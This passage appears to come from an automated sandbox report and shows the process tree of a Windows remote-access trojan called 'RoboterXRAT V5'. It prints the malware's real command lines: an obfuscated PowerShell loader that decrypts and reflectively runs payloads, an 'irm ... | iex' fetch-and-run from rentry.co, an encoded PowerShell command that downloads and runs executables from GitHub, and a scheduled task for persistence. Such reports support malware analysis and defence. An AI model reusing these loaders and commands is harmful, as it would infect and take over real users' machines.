        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        
        PID:5356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        10⤵
        
        PID:6072
        
        C:\Windows\system32\net.exe
        
        net file
        11⤵
        
        PID:4412
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        12⤵
        
        PID:4616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        
        PID:5748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        9⤵
        
        PID:2884
        
        C:\Windows\system32\net.exe
        
        net file
        10⤵
        
        PID:5044
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        11⤵
        
        PID:1132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        
        PID:5512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        8⤵
        
        PID:5792
        
        C:\Windows\system32\net.exe
        
        net file
        9⤵
        
        PID:5644
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        10⤵
        
        PID:5684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        
        PID:468
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        
        PID:5880
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        14⤵
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        13⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        13⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        12⤵
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        12⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        11⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        10⤵
        
        PID:5296
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        10⤵
        
        PID:3656
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        9⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        9⤵
        
        PID:5728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        7⤵
        
        PID:828
        
        C:\Windows\system32\net.exe
        
        net file
        8⤵
        
        PID:5676
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        9⤵
        
        PID:5700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        Executes dropped EXE
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        
        PID:6104
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        8⤵
        
        PID:1988
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        9⤵
        
        PID:5788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        10⤵
        
        PID:336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        11⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        12⤵
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        13⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        13⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        9⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        8⤵
        
        PID:4864
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        6⤵
        
        PID:2432
        
        C:\Windows\system32\net.exe
        
        net file
        7⤵
        
        PID:4372
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        8⤵
        
        PID:3300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1992
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        Executes dropped EXE
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        7⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        8⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        9⤵
        
        PID:920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        10⤵
        
        PID:4792
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        8⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6712.tmp.bat""
        8⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        9⤵
        Delays execution with timeout.exe
        
        PID:5728
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
